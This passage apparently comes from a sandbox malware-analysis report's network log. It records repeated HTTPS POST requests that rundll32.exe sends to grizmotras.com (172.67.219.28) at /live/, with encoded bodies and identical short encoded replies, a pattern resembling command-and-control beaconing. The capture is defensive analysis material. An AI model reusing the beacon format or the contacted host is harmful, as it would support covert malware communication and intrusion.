                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:18 UTC | 574 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kHIw4P2AdUN9SnPfOwp4mPtx5TK7WKQjcakS33lzjiHp4LZDI9LusEcgTFCV4MIzocZUrCzUoMIPfodfjXHvxJkluAkobHUzVSIjnlCZldg%2Fjdnihk%2BnYxtZFFkuN6fRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99aa7d9635c7b-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                37 | 192.168.2.5 | 49760 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:19 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:23 UTC | 580 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yCRv2sowikHOmB7ZOOkwIOQC2Fftl6R5AylAE%2BeZOi%2B2Iw%2FJ4TdWiG%2B2lxFLILOiPtQ1mIF%2FgoRP45lsywbyRofalQ5CKmrCbZpaTKFOakorosMrvbQL6RTq6HJHAiX6vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99acb7e174c04-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:23 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                38 | 192.168.2.5 | 49761 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:23 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:23 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RqAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:31 UTC | 582 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YeAzL4RYJsBnkS%2BgBtEqq7qRIrBmJioudMrxkCHw5jUjMszvvs%2BFE%2FTDRXr8Ct09FRxMX%2F2NkqA%2FgxYlRFPkYeE9lqhMTkHwAj65npcHs1cuMRDxxwvGQxWp5p1Q3%2FExag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99ae8b98ea4d3-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:31 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                39 | 192.168.2.5 | 49762 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:31 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:31 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RqA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:35 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4Xt68Cphe4qmYP40h5mT34QuNb%2BUWywAeLDAS7cwVWcrQpoZ1r9GO7n3mTaZCiiO9y6QJFhqjzhuH%2Ft%2FI9BCnmjppQ4F%2BE529ZjTy%2FqKn%2FfobUPrq7%2BkVTPaeRDMxnd1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b18585ca662-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:35 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                40 | 192.168.2.5 | 49763 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:35 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:35 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RqAsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:40 UTC | 580 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:40 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8nHXgPaFkANiStf4xdEMOh%2BSu%2BK310AkFe4plSSiqtzKo09LGe%2FW%2FVg2rQhl1kop9s5cBuyPACJa5AfFnYwFYWuSVYnuFM8sHsYNX3l3nJ91%2Buzl66HbVoDVmsKJjeKyTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b31693aa4f8-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:40 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                41 | 192.168.2.5 | 49764 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:40 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:40 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RqDcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:45 UTC | 582 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:45 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32e3jKfvfs2%2BturCG7P112Hb5Z%2Fbqge8729MVwy870VS6UjlkynteI0Y4a8SddkBpHoryNLuoptsFVNg1IC1EBGVvlV%2FFp9s%2FzO29%2Bqtwor7kspnQFpHJv0xzigCIQp%2FHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b51b83fa578-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:45 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                42 | 192.168.2.5 | 49765 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:46 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:46 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RqDMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:50 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:50 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gvxQV%2FgeYKf3vJsEEMNMMbCXQP43AMsrp8%2FW6W2Ts4wtdkZmqVgqaJkttlS8HtjMACdEH09M%2FfrihoAq1QUMbJjectgLocY71ZRunwyhRDUYK5abpE7nr2KBePl%2BY96dhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b746d09a558-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:50 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                43 | 192.168.2.5 | 49766 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:50 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:50 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RpBcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:18:54 UTC | 576 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:18:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1RYEJ4MMuDPUjCh%2Bd7v8uIC4nrcsyk3T1avSQF%2FrkiIZsQMKlz7o8i3%2FK7Uu72MQE7lgwiIDHwfn8fhjaOzpoT1G7ZaivgeZ5mzrB5pC0fKvgoBGxAkhXvhA2PoYuqZCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99b904abd2594-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:18:54 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                44 | 192.168.2.5 | 49767 | 172.67.219.28 | 443 | 180 | C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:18:54 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:54 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RpBMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:00 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwshMmcf1eJLPtlFu1zxYia625KNyGJwBt53%2Fabrdxq0MthgyEUwvxe0fMfETf7RAiH3maIgCHpK3%2FpJAMA%2BYNowq2clBSe6SjEkNviD8wwOFnNR%2FdSsMrKUvVbdapBtUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99ba98c8b67c3-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:00 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID: 45 | Source IP: 192.168.2.5 | Source Port: 49768 | Destination IP: 172.67.219.28 | Destination Port: 443 | PID: 180 | Process: C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:00 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:00 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RpB8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:04 UTC | 580 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:04 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFp6IVJG%2F7uBz%2FCVYVbX8JtCf%2BHS1iwSSuunGD0AoRfIJPhhwu4jPQYO%2FqjrbGy8AFYTdBxjDeAnuy9yinwcsVC2QPSDEqT7SYcQXbBZBGXaM7LPmpgzW7lLO%2BQF8lneJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99bce7ad6a698-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:04 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID: 46 | Source IP: 192.168.2.5 | Source Port: 49769 | Destination IP: 172.67.219.28 | Destination Port: 443 | PID: 180 | Process: C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:04 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:04 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RpBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:08 UTC | 580 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BfBiHs%2BqEhDCfqZH1ZLxofo3EfClIPmRM%2FlFDeZ4qrDvaTukE4jtu5Y89iFleqUHz6FbW7lzbibHKiElYrxjxB%2FMnekmSc%2FfNzW2rp6I3dkfEtuXrMroNNS5McEEizKcrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99be78b373361-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:08 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID: 47 | Source IP: 192.168.2.5 | Source Port: 49770 | Destination IP: 172.67.219.28 | Destination Port: 443 | PID: 180 | Process: C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:09 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:09 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RpAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:14 UTC | 576 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcijgRUaem2cxUJYrDyL4Lo1oswOaZoacTuZNQ5zPEbnTViMV1TydOBUW2vqpw%2FRJ%2FFC75o0Ie8mjOsBnRMI0iqHJID%2Bp3lue8WgXAUnb6xWpz9ovEMT1XNmCqCauJfnlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c044c7b74a0-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:14 UTC | 118 | IN
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID: 48 | Source IP: 192.168.2.5 | Source Port: 49771 | Destination IP: 172.67.219.28 | Destination Port: 443 | PID: 180 | Process: C:\Windows\System32\rundll32.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:19:14 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:14 UTC | 180 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RpAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:19 UTC | 582 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
